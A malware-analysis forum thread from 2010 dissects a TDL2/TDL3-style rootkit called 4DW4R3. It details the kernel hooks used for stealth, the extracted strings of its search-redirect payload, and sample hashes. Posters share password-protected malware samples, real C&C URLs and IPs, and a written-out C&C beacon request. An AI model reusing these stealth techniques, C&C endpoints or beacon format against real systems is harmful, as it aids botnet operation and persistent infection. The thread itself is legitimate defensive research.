A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #145  by EP_X0FF
 Mon Mar 15, 2010 2:10 am
Hybrid rootkit, combining TDL 2 and TDL 3 stealth functionality.
Firstly located ITW in the beginning of 2010.

Rootkit called 4DW4R3 because of strings found inside binary while RE.

Dropper using TDL3 spoolsv load driver technique, if it fails it calls NtLoadDriver directly.

Rootkit driver is hidden from PsLoadedModules list and performing SSDT hooking and IofCompleteRequest hooking to prevent removal of it's files.

Payload dll and driver file hidden under names (could be random part at end)
C:\WINDOWS\system32\4DW4R3oQegcHRgnX.dll
C:\WINDOWS\system32\drivers\4DW4R3NtISsUJPOt.sys
!-->[Hidden Driver] 0xB2689000 C:\WINDOWS\system32\drivers\4DW4R3.sys, size: 61440 bytes
ntkrnlpa.exe-->IofCompleteRequest, Type: Inline - RelativeJump 0x804EF226-->B268ABD7 [4DW4R3.sys]
ntkrnlpa.exe-->NtCallbackReturn, Type: Inline - RelativeJump 0x8050188C-->B268AEB9 [4DW4R3.sys]
ntkrnlpa.exe-->NtEnumerateKey, Type: Inline - RelativeJump 0x80623FC6-->B268A97D [4DW4R3.sys]
ntkrnlpa.exe-->NtSaveKey, Type: Inline - RelativeJump 0x8062523A-->B268A973 [4DW4R3.sys]
ntkrnlpa.exe-->NtSaveKeyEx, Type: Inline - RelativeJump 0x80625320-->B268A978 [4DW4R3.sys]
Hooks set on restoration.

NtEnumerateKey, NtSaveKey, NtSaveKeyEx hooks used to counteract detection via registry scanning.
NtSaveKey hook bypasses RootkitRevealer.

IofCompleteRequest hook responsible for hiding rootkit data. It hides all files by mask - 4DW4R3 (just as in case of TDL2 where similar technique was used)

NtCallbackReturn used as communication method between user mode payload and kernel mode rootkit (like NtFlushInstructionCache in TDL2).

Unpacked driver readable strings
.333 LoadLibraryExA System kernel32.dll s v c h o s t . e x e \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ s e r v i c e s \ 4 D W 4 R 3 \ m o d u l e s %s%s %s;%s \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ s e r v i c e s \ 4 D W 4 R 3 \ i n j e c t o r \\?\globalroot\systemroot\system32\4DW4R3c.dll svchost.exe * * \ K E R N E L 3 2 . D L L i m a g e p a t h % S group file system imagepath type \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ s e r v i c e s \ 4 D W 4 R 3 start \\?\globalroot\systemroot\system32\drivers\4DW4R3.sys 4 D W 4 R 3 \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ s e r v i c e s \ 4 D W 4 R 3 \ c o n n e c t i o n s %08x \ f i l e s y s t e m \ f l t m g r NtCallbackReturn NtSaveKeyEx NtSaveKey NtEnumerateKey IofCompleteRequest \ d r i v e r \ t c p i p \ f i l e s y s t e m \ f a s t f a t \ f i l e s y s t e m \ n t f s KeServiceDescriptorTable \\?\globalroot %.*S \ s y s t e m r o o t \ s y s t e m 3 2 \ % s %S%s%s n t d l l . d l l \ B a s e N a m e d O b j e c t s \ { 1 3 6 4 B 1 7 4 - D E C F - 4 5 8 a - A D E 3 - D D 2 9 4 9 6 1 C B D 2 } \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ e n u m \ r o o t \ l e g a c y _ 4 D W 4 R 3 \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ e n u m \ r o o t \ l e g a c y _ 4 D W 4 R 3 \ 0 0 0 0 \ r e g i s t r y \ m a c h i n e \ s y s t e m \ c u r r e n t c o n t r o l s e t \ e n u m \ r o o t \ l e g a c y _ 4 D W 4 R 3 \ 0 0 0 0 \ c o n t r o l
Payload dll injected into svchost.exe process (like TDL3 original) and removed from Loader list.

dll internals
4DW4R3SK 4DW4R3 %08x cmddelay \ r e g i s t r y \ m a c h i n e \ s o f t w a r e \ 4 D W 4 R 3 c redirurl &p= ?p= .yimg.com .yahoo. search search.yahoo. alltheweb.com .icq. search.icq. cdn.atwola. /search? search.aol. /web ask.com web/results altavista.com bing.com ?q= &q= /ie /custom /search google. & http/1.
host: http:// / ://
referer: <html><head><title>%s</title><meta http-equiv="refresh" content="0;url=%s?keyword=%s&uid=%s&seid=%d&original_uri=%s"></head></html> HTTP/1.1 200 OK
Cache-Control: no-cache,no-store,must-revalidate
Content-Type: text/html
Content-Length: %d
Connection: close
%s HTTP/1.1 302 Found
Location: %s
Content-Length: 0
Connection: close
urlmon.dll ObtainUserAgentString Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Unknown WinVista Win2003 WinXP Win2K WinNT4 WinNT3 WinME Win98 Win95 %ssp%d %s_%08X GET % S %d %x %s?id=%s&uid=%s&os=%s %[^.].%[^(](%[^)]) \\?\globalroot\systemroot\system32\4DW4R3sv.dat %.*S %s%s%x *browser* *avant* *netscape* *flock* *safari* *chrome* *opera* *mozilla* *firefox* *explore* .333 %[^;];%[^;];%[^;]; ws2_32.dll recv send WSARecv WSASend \ { 5 D B F 4 E 2 5 - 6 2 4 6 - 4 d c 2 - 8 2 B 0 - 4 A F 6 7 8 3 D 5 B B 5 } svchost.exe
Rootkit sets ImageLoad notify callback to perform dll-injection in newly started processes.

This malware also updating, so more fresh samples can be found in internet.

VirusTotal
http://www.virustotal.com/analisis/92c5 ... 1268618947

MD5
f039715e00a4279cfe9c6c224a70c09e

SHA1
0a4f6a6798187f30c60f580d9cfe5b482e824c49
Attachments
pass: malware
(48.5 KiB) Downloaded 132 times
 #162  by gjf
 Mon Mar 15, 2010 10:52 am
"TDL2 Clone" - does it mean the standard detection/removal tools for TDSS can be used? Actually TDL2 could be easily detected and removed using Gmer (and even AVZ but with Gmer information of course).
 #169  by EP_X0FF
 Mon Mar 15, 2010 1:16 pm
gjf wrote:"TDL2 Clone" - does it mean the standard detection/removal tools for TDSS can be used?
Yes, sure. All they should be able to detect and remove it.
 #336  by Cr4sh
 Fri Mar 19, 2010 1:55 pm
The attached sample has been configured for the following C&C's (from decrypted dll data):
Code: Select all
http://triplexfeed.com/search.php;25;15;
http://triplexfund.com/allbots_private_stat/cmd.php
But the host is dead:
Code: Select all
localhost ~ # nmap -sV -O -P0 95.143.192.25

Starting Nmap 5.00 ( http://nmap.org ) at 2010-03-20 00:43 MSK
All 1000 scanned ports on 95.143.192.25 are filtered
Too many fingerprints match this host to give specific OS details

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 219.81 seconds
Maybe, somebody has more actual sample?
 #343  by EP_X0FF
 Fri Mar 19, 2010 5:16 pm
Hi Cr4sh,

I've additionally two samples.

First dated 24 February 2010 (VirusTotal)

MD5
98864e5ae12ea7edb3fb42fd61803bfa

Second dated 7 March 2010 (VirusTotal)

MD5
dd28d91a89145d80c415e442271df813

Both attached here in archive, pass: malware

HTH
Attachments
pass: malware
(120.75 KiB) Downloaded 84 times
 #349  by Cr4sh
 Fri Mar 19, 2010 6:17 pm
Thanks.
Probably, they has some problems with server. triplexfund.com now is available (at 122.70.149.12). Valid C&C URL is (from last builds):
Code: Select all
GET /allbots_private_stat/cmd.php?id=XP_8823DEE4&uid=32&os=WinXPsp3 HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: triplexfund.com
Pragma: no-cache